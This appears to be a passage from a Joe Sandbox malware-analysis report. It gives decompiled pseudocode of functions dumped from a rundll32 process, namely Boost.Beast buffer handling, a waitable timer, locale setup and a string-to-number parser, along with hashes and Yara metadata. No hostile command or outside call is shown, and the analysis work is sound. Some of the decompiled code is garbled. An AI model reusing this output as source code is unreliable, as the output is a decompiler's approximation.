				_t120 =  >=  ? _t134 + 0xf8 : _t134 + 0xe0;
				_t89 =  *_t131;
				_t132 =  <  ? _t120 : _t131;
				_t133 =  *((intOrPtr*)( <  ? _t120 : _t131));
				if (_t133 != 0) goto 0x205a56c8;
				goto 0x205a56fe;
				if (_t133 - 0x1000 < 0) goto 0x205a56f3;
				if (_t133 + 0x27 - _t133 > 0) goto 0x205a56e0;
				E00000215215205F5BBC(_t61, __edx, _t133 + 0x27 - _t133, _t89, _t100, _t126);
				asm("int3");
				E00000215215205F4DCC(_t89, _t133 + 0x27);
				_t22 = _t89 + 0x27; // 0x27
				 *((long long*)((_t22 & 0xffffffe0) - 8)) = _t89;
				goto 0x205a56fe;
				E00000215215205F4DCC(_t89, _t133);
				_t129 = _t89;
				if ( *_t100 == 0) goto 0x205a5722;
				E0000021521520586F00(E00000215215205F7310(_t62, 0, _t66, _t67, _t129,  *((intOrPtr*)(_t100 + 8)), _t129, __r8, _t144), __edx, _t100,  *_t100,  *((intOrPtr*)(_t100 + 0x20)) -  *_t100);
				 *_t100 = _t129;
				 *((long long*)(_t100 + 8)) = _t129;
				_t112 = _t129 + _t144;
				 *((long long*)(_t100 + 0x10)) = _t112;
				 *((long long*)(_t100 + 0x18)) = _t112 + __r8;
				 *((long long*)(_t100 + 0x20)) = _t129 + _t133;
				goto 0x205a57de;
				 *((long long*)(_t134 + 0x20)) = 0x206278d0;
				 *((long long*)(_t134 + 0x28)) = 0x206278d0;
				 *((long long*)(_t134 + 0x30)) = 0x206278d0;
				 *((long long*)(_t134 + 0x50)) = "basic_flat_buffer too long";
				 *((char*)(_t134 + 0x58)) = 1;
				E00000215215205F7764(_t100, _t134 + 0x50, _t134 + 0x28, _t129, __r8);
				 *((long long*)(_t134 + 0x20)) = 0x20627910;
				 *((long long*)(_t134 + 0x20)) = 0x20627940;
				 *((long long*)(_t134 + 0x38)) = "D:\\Sources\\boost_1_78_0\\boost/beast/core/impl/flat_buffer.hpp";
				 *((long long*)(_t134 + 0x40)) = "class boost::asio::mutable_buffer __cdecl boost::beast::basic_flat_buffer<class std::allocator<char> >::prepare(unsigned __int64)";
				 *((long long*)(_t134 + 0x48)) = 0x145;
				E000002152152059FCD0(_t100, _t134 + 0x68, _t134 + 0x20, _t130, _t134 + 0x38);
				_t115 = _t134 + 0x68;
				_t60 = E00000215215205F9940(_t100, _t115, 0x2066b800, _t130);
				 *_t145 = _t115;
				 *((long long*)(_t145 + 8)) = _t130;
				return _t60;
			}






























                0x215205a55df
                0x215205a55e8
                0x215205a55f0
                0x215205a55f3
                0x215205a55f6
                0x215205a5601
                0x215205a5604
                0x215205a5608
                0x215205a560f
                0x215205a561b
                0x215205a5621
                0x215205a5625
                0x215205a5632
                0x215205a5638
                0x215205a563c
                0x215205a563f
                0x215205a5650
                0x215205a5655
                0x215205a5657
                0x215205a5660
                0x215205a5665
                0x215205a5668
                0x215205a566c
                0x215205a5670
                0x215205a5678
                0x215205a567c
                0x215205a5685
                0x215205a5691
                0x215205a56ac
                0x215205a56b0
                0x215205a56b7
                0x215205a56bb
                0x215205a56c2
                0x215205a56c6
                0x215205a56cf
                0x215205a56d8
                0x215205a56da
                0x215205a56df
                0x215205a56e0
                0x215205a56e5
                0x215205a56ed
                0x215205a56f1
                0x215205a56f6
                0x215205a56fb
                0x215205a5702
                0x215205a571d
                0x215205a5722
                0x215205a5725
                0x215205a5729
                0x215205a572d
                0x215205a5735
                0x215205a573d
                0x215205a5741
                0x215205a574d
                0x215205a5754
                0x215205a5759
                0x215205a5765
                0x215205a576a
                0x215205a5779
                0x215205a5786
                0x215205a5792
                0x215205a579e
                0x215205a57aa
                0x215205a57af
                0x215205a57c7
                0x215205a57d3
                0x215205a57d8
                0x215205a57de
                0x215205a57e4
                0x215205a57fe

                APIs
                Strings
                • class boost::asio::mutable_buffer __cdecl boost::beast::basic_flat_buffer<class std::allocator<char> >::prepare(unsigned __int64), xrefs: 00000215205A57A3
                • D:\Sources\boost_1_78_0\boost/beast/core/impl/flat_buffer.hpp, xrefs: 00000215205A5797
                • basic_flat_buffer too long, xrefs: 00000215205A575E
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ExceptionThrow__std_exception_copy
                • String ID: D:\Sources\boost_1_78_0\boost/beast/core/impl/flat_buffer.hpp$basic_flat_buffer too long$class boost::asio::mutable_buffer __cdecl boost::beast::basic_flat_buffer<class std::allocator<char> >::prepare(unsigned __int64)
                • API String ID: 1552479455-3830817604
                • Opcode ID: 243388d3072fccf316b3f9b6ae61306adf9277674fdeebfd3a50bfabf4517a00
                • Instruction ID: 3e828f61abe00dfa1da39936ac0c5d7b9bf38eed125bbfc16459796c79c89db2
                • Opcode Fuzzy Hash: 243388d3072fccf316b3f9b6ae61306adf9277674fdeebfd3a50bfabf4517a00
                • Instruction Fuzzy Hash: 08516933202FA4D5DB20DF15E4887D973A4FB98B94F9086629E9D037A8EF38C155C740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520594650 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 114timeCOMMON
                Download Yara Rule
                C-Code - Quality: 56%
                			E0000021521520594650(long long _a8, long long _a16) {
				void* _v24;
				char _v72;
				long long _v80;
				long long _v88;
				char _v96;
				char _v104;
				intOrPtr _v128;
				struct _CRITICAL_SECTION* _v136;
				void* _t59;
				void* _t75;
				long long _t76;
				long long _t80;
				long long _t81;
				long long _t84;
				long long _t98;
				void* _t102;
				long long _t103;
				void* _t105;
				long long _t106;
				long long _t109;
				void* _t112;
				void* _t117;
				struct _CRITICAL_SECTION* _t119;

				_t75 = _t112;
				 *((long long*)(_t75 - 0x78)) = 0xfffffffe;
				 *((long long*)(_t75 + 0x18)) = _t80;
				 *((long long*)(_t75 + 0x20)) = _t109;
				_t81 = _t98;
				_t103 = _t84;
				 *((long long*)(_t75 - 0x70)) = _t84 + 0x60;
				EnterCriticalSection(_t119);
				_v104 = 1;
				_t76 =  *((intOrPtr*)(_t103 + 0x88));
				 *((long long*)(_t81 + 8)) = _t76;
				 *((long long*)(_t103 + 0x88)) = _t81;
				r14d = 0;
				if ( *((intOrPtr*)(_t103 + 0x50)) != _t119) goto 0x20594785;
				r8d = 0;
				CreateWaitableTimerA(??, ??, ??);
				 *((long long*)(_t103 + 0x50)) = _t76;
				if (_t76 != 0) goto 0x2059474e;
				_t59 = GetLastError();
				E000002152152058F380(_t84 + 0x60, _t98);
				_t106 = _t76;
				_v96 = _t76;
				_v88 = _t76;
				if ( *((intOrPtr*)(_t106 + 8)) + 0xda812030 - 1 <= 0) goto 0x20594704;
				 *((intOrPtr*)( *_t106 + 0x30))();
				goto 0x20594709;
				_v80 = 0xda812030;
				_v96 = _t59;
				_v88 = _t106;
				if (((0 | _t59 != 0x00000000) & 1) == 0) goto 0x2059474e;
				if (0x4d54ee85da812032 != 1) goto 0x2059472c;
				if (_t59 == 0) goto 0x2059474e;
				E0000021521520590B90(0, _t81,  &_v72,  &_v96, "timer", _t102);
				E000002152152059DF30(_t59, _t81,  &_v72, _t106, "timer");
				_a8 = 0x4d2fa200;
				_v128 = r14d;
				_v136 = _t119;
				r9d = 0;
				r8d = 0x493e0;
				SetWaitableTimer(??, ??, ??, ??, ??, ??);
				if ( *((intOrPtr*)(_t103 + 0x48)) != _t119) goto 0x20594808;
				E00000215215205F4DCC(0x4d2fa200,  *((intOrPtr*)(_t103 + 0x50)));
				_a8 = 0x4d2fa200;
				 *0xFFFFFFFF4D2FA208 = _t119;
				 *0xFFFFFFFF4D2FA210 = _t119;
				E00000215215205F4DCC(0x4d2fa200,  *((intOrPtr*)(_t103 + 0x50)));
				_a16 = 0x4d2fa200;
				 *0x4d2fa200 = 0x2063f7f0;
				 *0x4d2fa200 = 0x2063c630;
				 *0xFFFFFFFF4D2FA218 = _t103;
				r8d = 0x10000;
				E0000021521520591990(0x4d2fa200, 0x4d2fa200, 0x4d2fa200, _t103, _t106, _t117);
				if ( *((intOrPtr*)(_t103 + 0x48)) == 0) goto 0x20594804;
				CloseHandle(_t105);
				E00000215215205F51EC(0x4d2fa200, 0x4d2fa200,  *((intOrPtr*)(_t103 + 0x48)));
				 *((long long*)(_t103 + 0x48)) = 0x4d2fa200;
				return LeaveCriticalSection(??);
			}


























                0x21520594650
                0x2152059465e
                0x21520594666
                0x2152059466a
                0x2152059466e
                0x21520594671
                0x21520594678
                0x2152059467f
                0x21520594685
                0x2152059468a
                0x21520594691
                0x21520594695
                0x2152059469c
                0x215205946a3
                0x215205946a9
                0x215205946b0
                0x215205946b6
                0x215205946bd
                0x215205946c9
                0x215205946cb
                0x215205946d0
                0x215205946d5
                0x215205946da
                0x215205946f4
                0x215205946fe
                0x21520594702
                0x21520594710
                0x21520594715
                0x21520594719
                0x21520594720
                0x21520594726
                0x2152059472a
                0x2152059473d
                0x21520594748
                0x21520594758
                0x21520594760
                0x21520594765
                0x2152059476a
                0x2152059476d
                0x2152059477f
                0x21520594789
                0x21520594790
                0x21520594798
                0x215205947a0
                0x215205947a4
                0x215205947ad
                0x215205947b2
                0x215205947c1
                0x215205947cb
                0x215205947ce
                0x215205947d2
                0x215205947de
                0x215205947eb
                0x215205947f1
                0x215205947ff
                0x21520594804
                0x21520594822

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: TimerWaitable$CloseCreateCriticalEnterErrorHandleLastSection
                • String ID: timer
                • API String ID: 2759181805-1792073242
                • Opcode ID: 1e1f0ab995bb584afdca0e867e6aa6780e29e9a68caf29b898cc2f10832ad2b9
                • Instruction ID: 0715650b8b0e492d593286714b266234bf2911bfe37dd3dfd57c6cd5354835f7
                • Opcode Fuzzy Hash: 1e1f0ab995bb584afdca0e867e6aa6780e29e9a68caf29b898cc2f10832ad2b9
                • Instruction Fuzzy Hash: 05519B33302FA4C6EB649F61E8887EA73A5FBD5B90F104165DE8943B98DF38D8558B40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205D8A6C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 59%
                			E00000215215205D8A6C(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				void* __rbp;
				intOrPtr _t26;
				void* _t29;
				void* _t43;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t56;
				signed long long _t57;
				intOrPtr _t64;
				intOrPtr* _t78;
				long long _t79;
				void* _t80;

				_t51 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t80 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t79 =  *0x20681c70; // 0x0
				_a24 = _t79;
				_t56 =  *0x20681930; // 0x0
				if (_t56 != 0) goto 0x205d8ae7;
				E00000215215205D19DC(0,  &_a8);
				_t43 =  *0x20681930 - _t56; // 0x0
				if (_t43 != 0) goto 0x205d8ad6;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x20681930 = _t51;
				_t29 = E00000215215205D1A5C(_t51,  &_a8);
				_t57 =  *0x20681930; // 0x0
				_t64 = _a8;
				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205d8afb;
				_t52 =  *((intOrPtr*)(_t64 + 0x10));
				goto 0x205d8afd;
				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205d8b8a;
				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205d8b23;
				E00000215215205D6CC0(_t29);
				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205d8b21;
				_t53 =  *((intOrPtr*)(_t52 + 0x10));
				goto 0x205d8b23;
				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205d8b8a;
				if (_t79 == 0) goto 0x205d8b32;
				goto 0x205d8b8a;
				E00000215215205DBA2C(0, 0, _t57,  &_a24, _t80, _t79, _t80);
				if (_t53 != 0xffffffff) goto 0x205d8b61;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
				asm("int3");
				_t78 = _a24;
				 *0x20681c70 = _t78;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
			}



















                0x215205d8a6c
                0x215205d8a74
                0x215205d8a7d
                0x215205d8a82
                0x215205d8a8c
                0x215205d8a92
                0x215205d8a99
                0x215205d8a9e
                0x215205d8aa8
                0x215205d8ab1
                0x215205d8ab6
                0x215205d8abd
                0x215205d8abf
                0x215205d8ac7
                0x215205d8acf
                0x215205d8adb
                0x215205d8ae0
                0x215205d8ae7
                0x215205d8aef
                0x215205d8af1
                0x215205d8af9
                0x215205d8b00
                0x215205d8b0a
                0x215205d8b0c
                0x215205d8b15
                0x215205d8b17
                0x215205d8b1f
                0x215205d8b26
                0x215205d8b2b
                0x215205d8b30
                0x215205d8b3a
                0x215205d8b43
                0x215205d8b4a
                0x215205d8b5b
                0x215205d8b60
                0x215205d8b61
                0x215205d8b66
                0x215205d8b77
                0x215205d8b7f
                0x215205d8ba3

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowcodecvt
                • String ID: false
                • API String ID: 1380809304-734881840
                • Opcode ID: 4a9446ec6d2eaec5e2504a0482ba1745b2ef33776e674e39c8e6a4b58bec5c23
                • Instruction ID: c49ead9c7730bd2e027b4c8fa92592e8d7f40ed666327d1be691613d9548b2ff
                • Opcode Fuzzy Hash: 4a9446ec6d2eaec5e2504a0482ba1745b2ef33776e674e39c8e6a4b58bec5c23
                • Instruction Fuzzy Hash: 20313B77306E60C1FA219B25E5582E96365EBE4BE0F185293EE6D07BEDDE38D4438700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535E6478 Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 492COMMON
                Download Yara Rule
                C-Code - Quality: 71%
                			E00007FFA7FFA535E6478(long long* __rax, long long __rbx, signed int* __rdx, long long __rsi, long long __rbp, void* __r8, long long _a8, intOrPtr _a16, long long _a24, long long _a32) {
				void* _v40;
				long long _v48;
				intOrPtr _v56;
				void* _v80;
				long long _v84;
				long long _v88;
				long long _v92;
				long long _v96;
				long long _v100;
				long long _v104;
				long long _v108;
				void* _v112;
				long long _v116;
				long long _v120;
				long long _v124;
				long long _v128;
				long long _v132;
				long long _v136;
				long long _v140;
				long long _v144;
				long long _v148;
				long long _v152;
				long long _v156;
				intOrPtr _v160;
				long long _v164;
				long long _v168;
				void* _t144;
				void* _t149;
				signed char _t151;
				void* _t154;
				signed short _t155;
				void* _t156;
				signed int _t157;
				signed char _t160;
				void* _t162;
				void* _t164;
				void* _t167;
				signed short _t168;
				signed char _t169;
				signed char _t170;
				void* _t171;
				void* _t173;
				void* _t182;
				void* _t263;
				signed int _t284;
				signed int* _t286;
				signed short* _t304;
				intOrPtr* _t305;
				void* _t326;
				long long* _t328;
				long long* _t329;
				signed long long _t340;
				long long* _t342;
				signed long long _t344;
				signed int _t348;
				signed int _t349;
				long long* _t355;
				long long* _t356;
				long long* _t379;
				signed int* _t380;
				intOrPtr* _t381;
				void* _t396;
				signed long long _t398;
				void* _t402;

				_t396 = __r8;
				_a8 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				r13d = 0;
				sil = r9b;
				r15d = r8d;
				_t380 = __rdx;
				if ( *((intOrPtr*)(__rdx)) != _t402) goto 0x535e64ce;
				_t144 = E00007FFA7FFA535E8380(__rax);
				 *__rax = 0x16;
				E00007FFA7FFA535E8260(_t144);
				_t342 =  *((intOrPtr*)(__rdx + 8));
				if (_t342 == 0) goto 0x535e64c7;
				 *_t342 =  *((intOrPtr*)(__rdx));
				goto 0x535e6c0f;
				if (r8d == 0) goto 0x535e64dc;
				if (0 - 0x22 > 0) goto 0x535e64a8;
				E00007FFA7FFA535E4AE8(0, __rbx,  &_v80, _t342);
				_v48 =  *_t380;
				goto 0x535e6512;
				_t284 =  *_t380 + 2;
				 *_t380 = _t284;
				_t344 = _t168 & 0x0000ffff;
				_t149 = E00007FFA7FFA535E8604(_t169, _t171,  *( *_t380) & 0x0000ffff, _t344);
				if (_t284 != 0) goto 0x535e6508;
				bpl = sil != 0;
				if (_t168 != 0x2d) goto 0x535e6538;
				goto 0x535e653e;
				_t182 = _t168 - 0x2b;
				if (_t182 != 0) goto 0x535e654b;
				_t286 =  *_t380 + 2;
				 *_t380 = _t286;
				_v84 = 0x66a;
				 *_t286 =  *_t286 + _t149;
				_t151 = _t149 + sil |  *_t286;
				 *((intOrPtr*)(_t344 + 0x30)) =  *((intOrPtr*)(_t344 + 0x30)) + dil;
				_v120 = 0xb66;
				if (_t182 < 0) goto 0x535e6586;
				 *_t286 =  *_t286 + _t151;
				r11d = 0xff10;
				_v96 = 0xc66;
				r10d = 0xd82484c7000009e6;
				_v152 = 0xc70;
				asm("out 0xc, al");
				 *0xae6 =  *0xae6 + _t151;
				r8d = 0x6f0;
				_v144 = 0xcf0;
				r9d = 0x966;
				_v88 = 0xd66;
				_v136 = 0xd70;
				_v104 = 0xe50;
				_v128 = 0xe5a;
				_v92 = 0xed0;
				_v168 = 0xeda;
				_v164 = 0xf20;
				_v156 = 0xf2a;
				_v148 = 0x1040;
				_v140 = 0x104a;
				_v132 = 0x17e0;
				_v124 = 0x17ea;
				_v116 = 0x1810;
				_v108 = 0x181a;
				_v100 = 0xff1a;
				if ((r15d & 0xffffffef) != 0) goto 0x535e68e2;
				if (_t168 - _t169 < 0) goto 0x535e6808;
				if (_t168 - 0x3a >= 0) goto 0x535e6656;
				goto 0x535e6803;
				if (_t168 - r11w >= 0) goto 0x535e67f1;
				if (_t168 - _t171 < 0) goto 0x535e6808;
				if (_t168 - _v84 >= 0) goto 0x535e667a;
				goto 0x535e6803;
				if (_t168 - r8w < 0) goto 0x535e6808;
				dil = 0xc3;
				goto 0x535e6803;
				if (_t168 - r9w < 0) goto 0x535e6808;
				dil = 0xc3;
				goto 0x535e6803;
				if (_t168 - r10w < 0) goto 0x535e6808;
				dil = 0xc3;
				_t154 = _t151 - r8d - r9d - r10d;
				goto 0x535e6803;
				if (_t168 - _t173 < 0) goto 0x535e6808;
				_t170 = _t169 |  *_t380;
				dil = 0xc3;
				goto 0x535e6803;
				if (_t168 - _t154 < 0) goto 0x535e6808;
				if (_t168 - _a16 >= 0) goto 0x535e6714;
				goto 0x535e6803;
				if (_t168 - _t171 < 0) goto 0x535e6808;
				if (_t168 - _v160 < 0) goto 0x535e6670;
				if (_t168 - _t171 < 0) goto 0x535e6808;
				if (_t168 - _v152 < 0) goto 0x535e6670;
				if (_t168 - _t171 < 0) goto 0x535e6808;
				if (_t168 - _v144 < 0) goto 0x535e6670;
				if (_t168 - _t171 < 0) goto 0x535e6808;
				if (_t168 - _v136 < 0) goto 0x535e6670;
				if (_t168 - _t171 < 0) goto 0x535e6808;
				if (_t168 - _v128 < 0) goto 0x535e6670;
				if (_t168 - _t171 < 0) goto 0x535e6808;
				if (_t168 - _v168 < 0) goto 0x535e6670;
				if (_t168 - _t171 < 0) goto 0x535e6808;
				if (_t168 - _v156 < 0) goto 0x535e6670;
				if (_t168 - _t171 < 0) goto 0x535e6808;
				if (_t168 - _v140 < 0) goto 0x535e6670;
				if (_t168 - _t171 < 0) goto 0x535e6808;
				if (_t168 - _v124 < 0) goto 0x535e6670;
				if (_t168 - _t171 < 0) goto 0x535e6808;
				if (_t168 - _v108 >= 0) goto 0x535e6808;
				goto 0x535e6670;
				if (_t168 - _v100 >= 0) goto 0x535e6800;
				_t155 = _t154 - r11d;
				goto 0x535e6803;
				if ((_t168 & 0x0000ffff | 0xffffffff) != 0xffffffff) goto 0x535e6831;
				if (_t155 - 0x19 <= 0) goto 0x535e681f;
				if (_t155 - 0x19 <= 0) goto 0x535e681f;
				goto 0x535e6831;
				if (_t155 - 0x19 > 0) goto 0x535e682e;
				if (r15d != 0) goto 0x535e6894;
				r15d = 0xb74c0850000000a;
				goto 0x535e6894;
				_t304 =  *_t380;
				r8d = 0xffdf;
				_t377 =  *_t304 & 0x0000ffff;
				_t61 =  &(_t304[1]); // 0xffe1
				_t348 = _t61;
				 *_t380 = _t348;
				_t62 = _t377 - 0x58; // 0x608
				_t305 = _t62;
				if ((r8w & _t155) == 0) goto 0x535e68ca;
				r15d =  ==  ? _t173 : r15d;
				_t349 = _t348 + 0xfffffffe;
				 *_t380 = _t349;
				if (_t171 == 0) goto 0x535e688f;
				if ( *_t349 == _t171) goto 0x535e688f;
				_t156 = E00007FFA7FFA535E8380(_t305);
				 *_t305 = 0x16;
				_t157 = E00007FFA7FFA535E8260(_t156);
				r11d = 0xff10;
				asm("ror byte [eax-0x7d], cl");
				asm("enter 0x41ff, 0xbd");
				asm("pushad");
				asm("push es");
				 *_t305 =  *_t305 + _t157;
				r12d = 0x6f0;
				if (_t168 - _t170 < 0) goto 0x535e6a8c;
				if (_t168 - 0x3a >= 0) goto 0x535e68e9;
				r8d = _t168 & 0x0000ffff;
				r8d = r8d - _t170;
				goto 0x535e6a86;
				_t340 =  *0x30 & 0x0000ffff;
				_t381 =  ==  ? 0x10 : _t380;
				 *_t381 = 0x33d7634d00000032;
				goto 0x535e688f;
				if (_t340 - _t340 >= 0) goto 0x535e6a72;
				if (_t168 - r13w < 0) goto 0x535e6a8c;
				r8d = r8d - r13d;
				goto 0x535e6a86;
				if (_t168 - r12w < 0) goto 0x535e6a8c;
				_t160 = _t157 / _t398 | 0x44;
				r8d = r8d - r12d;
				goto 0x535e6a86;
				asm("or byte [ebx+0x1], 0x0");
				 *0x966 =  *0x966 + 0x966;
				 *0xEC149C7500000108 =  *((intOrPtr*)(0xec149c7500000108)) + _t160;
				spl = spl |  *0x4166ABEB00000049;
				if (_t340 - 0x966 >= 0) goto 0x535e6957;
				r8d = _t168 & 0x0000ffff;
				r8d = r8d - _t160;
				goto 0x535e6a86;
				asm("and byte [edi], 0x1");
				 *0x9e6 =  *0x9e6 + 0x9e6;
				 *((intOrPtr*)(0xec149c7500000108)) =  *((intOrPtr*)(0xec149c7500000108)) + _t160;
				spl = spl |  *0x4166ABEB00000049;
				if (_t340 - 0x9e6 < 0) goto 0x535e694b;
				_t84 = _t396 + 0x76; // 0xa66
				if (_t168 - _t84 < 0) goto 0x535e6a8c;
				r8d = 0xfd83b66000009f0;
				if (_t168 - r8w < 0) goto 0x535e694b;
				_t86 = _t396 + 0x76; // 0xae6
				_t162 = _t86;
				if (_t168 - _t162 < 0) goto 0x535e6a8c;
				if (_t168 - _a16 < 0) goto 0x535e694b;
				if (_t168 - _t162 < 0) goto 0x535e6a8c;
				if (_t168 - _v160 < 0) goto 0x535e694b;
				if (_t168 - _t162 < 0) goto 0x535e6a8c;
				if (_t168 - _v152 < 0) goto 0x535e694b;
				if (_t168 - _t162 < 0) goto 0x535e6a8c;
				if (_t168 - _v144 < 0) goto 0x535e694b;
				if (_t168 - _t162 < 0) goto 0x535e6a8c;
				if (_t168 - _v136 < 0) goto 0x535e694b;
				if (_t168 - _t162 < 0) goto 0x535e6a8c;
				if (_t168 - _v128 < 0) goto 0x535e694b;
				if (_t168 - _t162 < 0) goto 0x535e6a8c;
				if (_t168 - _v168 < 0) goto 0x535e694b;
				if (_t168 - _t162 < 0) goto 0x535e6a8c;
				if (_t168 - _v156 < 0) goto 0x535e694b;
				if (_t168 - _t162 < 0) goto 0x535e6a8c;
				if (_t168 - _v140 < 0) goto 0x535e694b;
				if (_t168 - _t162 < 0) goto 0x535e6a8c;
				if (_t168 - _v124 < 0) goto 0x535e694b;
				if (_t168 - _t162 < 0) goto 0x535e6a8c;
				if (_t168 - _v108 >= 0) goto 0x535e6a8c;
				goto 0x535e694b;
				if (_t168 - _v100 >= 0) goto 0x535e6a82;
				r8d = _t168 & 0x0000ffff;
				r8d = r8d - r11d;
				goto 0x535e6a86;
				r8d = r8d | 0xffffffff;
				if (r8d != 0xffffffff) goto 0x535e6ab9;
				if (_t162 - 0x19 <= 0) goto 0x535e6aa4;
				if (_t162 - 0x19 <= 0) goto 0x535e6aa4;
				r8d = r8d | 0xffffffff;
				goto 0x535e6ab9;
				_t111 = _t340 - 0x61; // 0xfeaf
				_t326 = _t111;
				r8d = _t168 & 0x0000ffff;
				if (_t162 - 0x19 > 0) goto 0x535e6ab5;
				r8d = r8d - 0x20;
				r8d = r8d + 0xffffffc9;
				if (r8d == 0xffffffff) goto 0x535e6afe;
				if (r8d - r15d >= 0) goto 0x535e6afe;
				_t263 = _t402 - _t305;
				if (_t263 < 0) goto 0x535e6ada;
				if (_t263 != 0) goto 0x535e6ad5;
				if (_t326 - ( *_t304 & 0x0000ffff) <= 0) goto 0x535e6ada;
				goto 0x535e6aec;
				r14d = r8d;
				dil = 0x18;
				 *_t381 = _t326 + 2;
				goto 0x535e68af;
				 *_t381 =  *_t381 + 0xfffffffe;
				r13d = 0;
				_t328 =  *_t381;
				if (_t168 == 0) goto 0x535e6b2a;
				if ( *_t328 == _t168) goto 0x535e6b2a;
				_t164 = E00007FFA7FFA535E8380(_t328);
				 *_t328 = 0x16;
				E00007FFA7FFA535E8260(_t164);
				if ((sil & bpl) != 0) goto 0x535e6b51;
				 *_t381 = _v48;
				if (_v56 == r13b) goto 0x535e64b8;
				_t329 = _v80;
				 *(_t329 + 0x3a8) =  *(_t329 + 0x3a8) & 0xfffffffd;
				goto 0x535e64b8;
				if (E00007FFA7FFA535E6118(_t170) == 0) goto 0x535e6bde;
				_t167 = E00007FFA7FFA535E8380(_t329);
				 *_t329 = 0x22;
				if ((bpl & 0x00000001) != 0) goto 0x535e6b76;
				goto 0x535e6be7;
				if ((bpl & 0x00000002) == 0) goto 0x535e6bad;
				if (_v56 == r13b) goto 0x535e6b92;
				 *(_v80 + 0x3a8) =  *(_v80 + 0x3a8) & 0xfffffffd;
				_t355 =  *((intOrPtr*)(_t381 + 8));
				if (_t355 == 0) goto 0x535e6ba1;
				 *_t355 =  *_t381;
				goto 0x535e6c0f;
				if (_v56 == r13b) goto 0x535e6bc3;
				 *(_v80 + 0x3a8) =  *(_v80 + 0x3a8) & 0xfffffffd;
				_t356 =  *((intOrPtr*)(_t381 + 8));
				if (_t356 == 0) goto 0x535e6bd2;
				 *_t356 =  *_t381;
				goto 0x535e6c0f;
				if ((bpl & 0x00000002) == 0) goto 0x535e6be7;
				if (_v56 == r13b) goto 0x535e6bfd;
				 *(_v80 + 0x3a8) =  *(_v80 + 0x3a8) & 0xfffffffd;
				_t379 =  *((intOrPtr*)(_t381 + 8));
				if (_t379 == 0) goto 0x535e6c0c;
				 *_t379 =  *_t381;
				return _t167;
			}



































































                0x7ffa535e6478
                0x7ffa535e6478
                0x7ffa535e647d
                0x7ffa535e6482
                0x7ffa535e6497
                0x7ffa535e649a
                0x7ffa535e649d
                0x7ffa535e64a0
                0x7ffa535e64a6
                0x7ffa535e64a8
                0x7ffa535e64ad
                0x7ffa535e64b3
                0x7ffa535e64b8
                0x7ffa535e64bf
                0x7ffa535e64c4
                0x7ffa535e64c9
                0x7ffa535e64d1
                0x7ffa535e64da
                0x7ffa535e64e4
                0x7ffa535e64ef
                0x7ffa535e6506
                0x7ffa535e650e
                0x7ffa535e6514
                0x7ffa535e6517
                0x7ffa535e651a
                0x7ffa535e6521
                0x7ffa535e6529
                0x7ffa535e6531
                0x7ffa535e6536
                0x7ffa535e6538
                0x7ffa535e653c
                0x7ffa535e6544
                0x7ffa535e6548
                0x7ffa535e654b
                0x7ffa535e655c
                0x7ffa535e6560
                0x7ffa535e6562
                0x7ffa535e6568
                0x7ffa535e6579
                0x7ffa535e657b
                0x7ffa535e657d
                0x7ffa535e6583
                0x7ffa535e658b
                0x7ffa535e658f
                0x7ffa535e65a0
                0x7ffa535e65a2
                0x7ffa535e65a4
                0x7ffa535e65aa
                0x7ffa535e65b2
                0x7ffa535e65b8
                0x7ffa535e65c0
                0x7ffa535e65c8
                0x7ffa535e65d0
                0x7ffa535e65d8
                0x7ffa535e65e0
                0x7ffa535e65e8
                0x7ffa535e65f0
                0x7ffa535e65f8
                0x7ffa535e6600
                0x7ffa535e6608
                0x7ffa535e6610
                0x7ffa535e6618
                0x7ffa535e6620
                0x7ffa535e6628
                0x7ffa535e6637
                0x7ffa535e6640
                0x7ffa535e664a
                0x7ffa535e6651
                0x7ffa535e665a
                0x7ffa535e6663
                0x7ffa535e666e
                0x7ffa535e6675
                0x7ffa535e667e
                0x7ffa535e668f
                0x7ffa535e6694
                0x7ffa535e669d
                0x7ffa535e66ae
                0x7ffa535e66b3
                0x7ffa535e66bc
                0x7ffa535e66cd
                0x7ffa535e66cf
                0x7ffa535e66d2
                0x7ffa535e66da
                0x7ffa535e66e9
                0x7ffa535e66eb
                0x7ffa535e66ef
                0x7ffa535e66f7
                0x7ffa535e6705
